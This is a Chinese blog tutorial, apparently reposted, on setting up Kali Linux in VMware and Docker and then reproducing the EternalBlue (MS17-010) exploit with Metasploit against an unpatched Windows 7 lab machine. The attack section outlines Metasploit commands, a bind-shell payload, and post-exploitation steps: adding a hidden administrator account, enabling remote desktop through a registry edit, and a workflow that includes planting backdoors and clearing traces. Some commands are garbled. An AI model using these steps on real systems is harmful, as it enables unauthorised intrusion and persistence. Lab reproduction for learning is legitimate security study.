docker kali安装及复现永恒之蓝漏洞

虚拟机安装kali教程

下载地址:

https://www.kali.org/downloads/

选择版本

![image-20190823155008224](/Users/huan/Library/Application Support/typora-user-images/image-20190823155008224.png)

打开VMware Fusion,点击如图中的+,选择新建

![image-20190823154416670](/Users/huan/Library/Application Support/typora-user-images/image-20190823154416670.png)

选择安装方法,点击继续

![image-20190823154623088](/Users/huan/Library/Application Support/typora-user-images/image-20190823154623088.png)

点击使用其他光盘或镜像

![image-20190823154656552](/Users/huan/Library/Application Support/typora-user-images/image-20190823154656552.png)

选择已经下载好的镜像

![image-20190823154826441](/Users/huan/Library/Application Support/typora-user-images/image-20190823154826441.png)

选择操作系统

![image-20190823155230976](/Users/huan/Library/Application Support/typora-user-images/image-20190823155230976.png)

固件类型选择传统BIOS

![image-20190823155256440](/Users/huan/Library/Application Support/typora-user-images/image-20190823155256440.png)

给系统配置硬件,选择自定设置

![image-20190823155442317](/Users/huan/Library/Application Support/typora-user-images/image-20190823155442317.png)

点击完成,进入配置页面

![image-20190823155534551](/Users/huan/Library/Application Support/typora-user-images/image-20190823155534551.png)

选择处理器和内存

![image-20190823155608826](/Users/huan/Library/Application Support/typora-user-images/image-20190823155608826.png)

设置好之后关闭页面并启动,选择graphical install(图形界面安装)

img

选择语言,国家等

![image-20190823160524932](/Users/huan/Library/Application Support/typora-user-images/image-20190823160524932.png)

配置域名

![image-20190823160630369](/Users/huan/Library/Application Support/typora-user-images/image-20190823160630369.png)

配置密码

![image-20190823160709339](/Users/huan/Library/Application Support/typora-user-images/image-20190823160709339.png)

磁盘分区

![image-20190823160814662](/Users/huan/Library/Application Support/typora-user-images/image-20190823160814662.png)

![image-20190823160837645](/Users/huan/Library/Application Support/typora-user-images/image-20190823160837645.png)

![image-20190823160912834](/Users/huan/Library/Application Support/typora-user-images/image-20190823160912834.png)

![image-20190823160933557](/Users/huan/Library/Application Support/typora-user-images/image-20190823160933557.png)

等。。。

![image-20190823161227325](/Users/huan/Library/Application Support/typora-user-images/image-20190823161227325.png)

![image-20190823161805462](/Users/huan/Library/Application Support/typora-user-images/image-20190823161805462.png)

![image-20190823161822175](/Users/huan/Library/Application Support/typora-user-images/image-20190823161822175.png)

![image-20190823161955944](/Users/huan/Library/Application Support/typora-user-images/image-20190823161955944.png)

![image-20190823162046731](/Users/huan/Library/Application Support/typora-user-images/image-20190823162046731.png)

经历了这么多前戏,马上进入主题,有没有很兴奋

![image-20190823162148328](/Users/huan/Library/Application Support/typora-user-images/image-20190823162148328.png)

安装完毕

![image-20190823162319597](/Users/huan/Library/Application Support/typora-user-images/image-20190823162319597.png)

安装docker

yum install docker -y
systemctl enable docker
systemctl start docker

第一个是kali的官方镜像,所以我安装的是第一个镜像

# 查找kali版本
docker search kali

# 获取kali镜像
docker pull kalilinux/kali-linux-docker

运行kali镜像

docker run -it -d --name=kali kalilinux/kali-linux-docker /bin/bash

进入容器

docker exec -it kali /bin/bash

更新

apt-get update && apt-cache search kali-linux

安装kali

apt-get install kali-linux-full -y

其他相关命令

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y 

命令讲解:
apt-get clean //清除缓存索引
apt-get update //更新索引文件
apt-get upgrade //更新实际的软件包文件
apt-get dist-upgrade //根据依赖关系更新

  1. 建立一个组织及域名

  2. 查找该组织下的所有IT资产

  3. 分析IT资产是否存在可利用的方式

  4. 如果有可利用的漏洞,准备漏洞利用脚本

  5. 控制服务器并设置后门

  6. 清除痕迹并打补丁

准备工作

卸载Windows补丁

打开控制面板--系统和安全--Windows update--查看已安装的更新

卸载以kb4和4以上开头的补丁,因为漏洞一旦被发现和公开,官网会通过打补丁的方式去修复漏洞

为了方便演示就把所有的补丁卸载掉

开始渗透

使用永恒之蓝做演示

img

# 搜索可利用的漏洞模块
search ms17-010

# 使用模块
use xxxx

# 查看攻击载荷
show payloads

# 查看影响的系统版本
show targets

# 选择攻击载荷
use payload xxxx

# 查看需要的参数
show options

# yes为必填
set xxx xxxxxx
set payload windows/x64/powershell_bind_tcp

# 实施攻击
exploit

攻击载荷(payload)

是成功执行漏洞攻击之后被安装在目标系统中的附加软件或功能。

目标windows的常用payload样例:

payload名称 功能描述

  • Windows/adduser:在目标计算机上的本地管理员组创建新用户。

  • Windows/exec: 在目标计算机上执行Windows二进制文件(.exe)。

  • Windows/shell_bind_tcp: 是适用于Windows操作系统平台,能够将Shell控制会话绑定在指定TCP端口上的攻击载荷。

  • bind_tcp:正向连接 (目标监听) ,是攻击者主动连接服务器得到一个SHELL

  • reverse_tcp:反向连接 (本机监听) ,是服务器来连接攻击者,返回一个SHELL

    注:reverse_tcp 就是攻击者开启端口等待远程目标连接,bind_tcp 就是远程目标开启一个端口,等待攻击者连接 。

创建新用户Dragon

netuser Dragon 123456 /add

将用户Dragon添加至管理员组

netlocalgroup administrators Dragon /add

创建用户名密码 blue/blue
net user blue blue /add
将用户blue添加入管理组
net localgroup administrators blue /add
开启远程桌面功能
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 172.16.70.199:3389

原文地址:https://www.cnblogs.com/liuhuan086/p/14716514.html